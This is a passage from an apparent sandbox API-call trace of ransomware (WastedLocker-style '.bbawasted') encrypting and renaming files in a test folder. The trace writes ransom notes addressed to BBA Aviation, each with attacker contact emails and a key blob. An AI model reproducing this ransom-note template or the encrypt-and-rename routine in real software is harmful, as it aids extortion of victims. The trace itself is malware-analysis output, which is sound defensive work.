dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x47e) returned 0x640000 [0164.320] CloseHandle (hObject=0x27c) returned 1 [0164.352] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0164.352] CloseHandle (hObject=0x288) returned 1 [0164.352] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0164.352] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6570) returned 1 [0164.353] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0164.353] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0164.353] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6350) returned 1 [0164.354] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0164.354] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0164.364] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0164.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0164.365] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.365] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]E0lV/ryCkhUFQwa8doU8HGGuecMIx3V1Op6D4ZTnCSkZNVEL1PAcxWia2gYSh81m\r\n3ZJC9DOYJ5RPoW8EOWX3r7hvBkt+WQPhCL7rO8GioN+Tsy/DaMYeK+/UtlFpBUT9\r\nog0eLggwM1DDuZ2DUKMgjaasHeXEms4LlcFkD09fDJ91xaD8RqZWUThhGcmKGSdP\r\nu8FdZfRBKZIC5IPwFY6UUP3USW+1Yexs/A1uS0jXHUojGcpLvDJ0/E/6YKQ+1QHE\r\nAhrPJXgZYRtXP1qpLYRJcRO6V8IisCidylL+3CI1ocScy05MjXYLDdmm0vtZU0Oc\r\nMFy/WehgS6ZJ9tihyY76fgmSsAuwAe3QX5aEmFLgPCMFHOWGaTliRNm7N0kHKraz\r\n7Of+rC8jlwPDQz2qAOKTb17j11KWH22cwFWl+j4dkX0AR85UaT4cBkGc3+WcJk2h\r\n3i6naSEGvvkQj0QxT8WAqbSqKZHfweCcqlxxeaDWaCZYwpC8ovhz97fYq4ISy2F5\r\nCP3TscFaYwA/1pSFhJkqxr2uX/rn86xApeJ5W7BVZpo0mzQ0IE9eSveHJ4CzwT+d\r\ni1pOhwm1tXvRjeJkH9mnj/j8CdyoQ722CSL9HcPwn1nbb/1yf5Kdcj1PI41JOlce\r\n1mQIyBfnW2Zm8FTEJITd0zJ/FZYUrih92o/z03M1Ng0=[end_key]\r\nKEEP IT\r\n") returned 984 [0164.365] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0164.365] WriteFile (in: hFile=0x28c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0164.365] SetEndOfFile (hFile=0x28c) returned 1 [0164.368] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.368] CloseHandle (hObject=0x28c) returned 1 [0164.373] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0164.374] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1bf8 | out: hHeap=0x660000) returned 1 [0164.374] _aulldvrm () returned 0x0 [0164.374] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6818) returned 1 [0164.374] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0164.374] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0164.374] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\header.bmp") returned 36 [0164.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x252) returned 0x6aecf0 [0164.375] lstrcpyW (in: lpString1=0x6aed38, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0164.375] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.375] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0164.375] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0164.375] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0164.376] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\header.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0164.376] WriteFile (in: hFile=0x28c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0164.378] SetEndOfFile (hFile=0x28c) returned 1 [0164.378] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.378] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.378] lstrcpyW (in: lpString1=0x6aed38, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0164.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp" (normalized: "c:\\588bce7c90097ed212\\header.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp.bbawasted" (normalized: "c:\\588bce7c90097ed212\\header.bmp.bbawasted")) returned 1 [0164.807] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\header.bmp.bbawasted" (normalized: "c:\\588bce7c90097ed212\\header.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0164.807] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0164.807] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xe2c [0164.807] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe2c) returned 0x640000 [0164.808] CloseHandle (hObject=0x294) returned 1 [0164.812] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0164.812] CloseHandle (hObject=0x27c) returned 1 [0164.813] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0164.813] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0164.813] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0164.813] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0164.814] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6a38) returned 1 [0164.814] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0164.814] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0164.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0164.825] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0164.825] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.825] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HUw8e0p8UJAdFJq7D+dgw29jTWE64PCGji5TA7/HWL7R7UuQNy0i4uQY/h05LR7T\r\n4urrIYCukuoaWy8BwQ/DUt82g2neVI5fmzop2ADoVKDfthUbmUIocDGmXWog61zz\r\nJDD82TgugO0zyrCpczUJE2tcxuU7YS96jogrjHhAxZv7vv2a0+4AWvjWxWwH7lYC\r\nLuuDIJJWCMNAbyQAIS8TuGStFd+fhSJkAUVN0Vf5lobSH4hUyfYoHOKao37qmERK\r\n+miPT480w9ATE0+9IVHEhgWGRb93OI15WbH6gi+ipeMtdn2rLZgJmbzMfsDZTb2c\r\np53C4o140CQ9nr06obOLynDgCyzdEbhjPDro/m8wpZg/eSQMNNtORBv21tXOE7XX\r\nW3TzZyy/YB0aB48+b+4JZ4sBB/1eI4rk5Tohne43h7K7eOEEfHF7vo2g4Z68xv6p\r\nbFIf7gjibFBqFCUtqIFnJ0A3o91KIXzNWfIg7lp4UDTvwJ1FSVh3l0pt9CslSNiw\r\n2ydCkmdb8oAdZxbi2/d0tZIVZCbEvsvnnF7yQxPn5oDwD/qyl61wU/UnIMwJjwWn\r\ny1wGyjMzxnWVnmDA7PWWJ3aNnKNA0JsZ49CBFMyVbKeqKzs42/H1g7hQtPVczN1/\r\nxvYROK4qAgZ2qTBiVPNcKTZjZbDbEVWvf2Dze1SUqjG=[end_key]\r\nKEEP IT\r\n") returned 984 [0164.825] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0164.825] WriteFile (in: hFile=0x28c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0164.825] SetEndOfFile (hFile=0x28c) returned 1 [0164.828] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.828] CloseHandle (hObject=0x28c) returned 1 [0164.830] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0164.830] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3500 | out: hHeap=0x660000) returned 1 [0164.831] _aulldvrm () returned 0x0 [0164.831] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0164.831] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0164.831] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0164.831] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 44 [0164.832] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x6aecf0 [0164.832] lstrcpyW (in: lpString1=0x6aed48, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0164.832] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.832] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6570) returned 1 [0164.832] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0164.833] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0164.833] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0164.834] WriteFile (in: hFile=0x28c, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0164.835] SetEndOfFile (hFile=0x28c) returned 1 [0164.835] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.835] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.835] lstrcpyW (in: lpString1=0x6aed48, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0164.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz.bbawasted" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.bbawasted")) returned 1 [0164.837] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\netfx_Extended.mzz.bbawasted" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0164.837] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0164.837] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x29222c7 [0164.837] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x29222c7) returned 0x1480000 [0164.838] CloseHandle (hObject=0x27c) returned 1 [0175.548] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0177.965] CloseHandle (hObject=0x294) returned 1 [0177.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0177.965] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0178.114] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0178.114] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0178.115] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0178.115] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0178.115] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0178.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0178.127] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0178.127] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0178.127] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]KCfRaj87TBmaq6z9GKSAbgNwnxgxISBYdOuvYmf1PWvvs/gqspCOjg3XgKHGsqNf\r\nBlnKkruL9rxP3YjAmokrK/+Te3UG4ie0slpTXKiB87yPPz6MHYnkWY9sFZtG1ZS6\r\nP+bXOmNHOxp2ifuDMl4u+7A9kDvRdrJXUerCUIq76PJw/X3o0ZKxf+HVLmAeYR0F\r\n4UpINfEMtBzxQ02pB5Qk5hOc91f0cfXC30w+UqRrkc7hXZTD92eIddCOQnh2mWYp\r\nvlXmYPo24XtrwUxr4biEda/X0gVEjNa6ZZV2NJj+oBhNys52e6lHiVar7AfzLUin\r\ng0T4fxoP/R2ALv8Ynm21Oe2fU9D1uDuqN1O7k6ys4fnOAnXs/MLrPPwowPpYsd2e\r\ngPJU7EciUARlPpzNoia6QHgAtYWPYXQmhv53XDj/v3SgyclgfhLjTnCswG/Fy3JL\r\nFIdjJDCZqfP2uqKYpEnRqDHHVKfcnlj71r5cgN24VEjE0ytVi24Oiw2xte2ofTvu\r\nFtgNznDoe3ahj5Bh26728j9PPyJi45wVSuFLCzJFEJiyfHgk1HgDlYoW785s2rJ+\r\nQAX9YA7klL4m7fkUAs2UOLAIrXvcQ46rrRO8ri+Y83tcof9lq2B1q9J0uWlUCet/\r\nGUNLdLxbPAZdwiT/o5oKKZG7ZsbP5nKVGubp2sHcJ1f=[end_key]\r\nKEEP IT\r\n") returned 984 [0178.128] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0178.128] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0178.129] SetEndOfFile (hFile=0x28c) returned 1 [0178.133] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0178.133] CloseHandle (hObject=0x28c) returned 1 [0178.136] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0178.137] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3da0 | out: hHeap=0x660000) returned 1 [0178.137] _aulldvrm () returned 0x0 [0178.137] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6b48) returned 1 [0178.138] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0178.138] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0178.138] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml") returned 43 [0178.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x260) returned 0x6aecf0 [0178.138] lstrcpyW (in: lpString1=0x6aed46, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0178.138] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0178.138] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6928) returned 1 [0178.139] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0178.139] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0178.139] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0178.141] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0178.143] SetEndOfFile (hFile=0x28c) returned 1 [0178.143] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0178.143] lstrcpyW (in: lpString1=0x6aed46, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0178.143] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.bbawasted")) returned 1 [0178.146] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\ParameterInfo.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\parameterinfo.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0178.146] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0178.147] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x426ae [0178.147] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x426ae) returned 0x1480000 [0178.147] CloseHandle (hObject=0x294) returned 1 [0178.277] UnmapViewOfFile (lpBaseAddress=0x1480000) returned 1 [0178.280] CloseHandle (hObject=0x280) returned 1 [0178.280] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0178.280] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6a38) returned 1 [0178.281] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0178.281] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0178.281] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0178.281] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0178.281] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0178.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0178.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0178.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0178.292] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 